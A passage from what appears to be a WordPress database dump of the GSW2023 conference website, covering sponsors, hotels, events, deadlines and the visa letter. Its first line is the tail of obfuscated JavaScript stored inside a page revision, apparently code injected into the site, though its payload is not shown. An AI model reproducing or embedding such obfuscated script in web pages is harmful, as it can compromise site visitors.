_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-11 13:10:29','2023-07-11 13:10:29','',3066,'https://gsw2023.com/?p=5004',0,'revision','',0),
(5005,1,'2023-07-11 13:12:30','2023-07-11 13:12:30','','aboquir','','inherit','open','closed','','aboquir','','','2023-07-11 13:12:30','2023-07-11 13:12:30','',3066,'https://gsw2023.com/wp-content/uploads/2023/07/aboquir.png',0,'attachment','image/png',0),
(5006,1,'2023-07-11 13:14:38','2023-07-11 13:14:38','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081268291{margin-top: 60px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081246466{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><img class=\"wp-image-5005 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 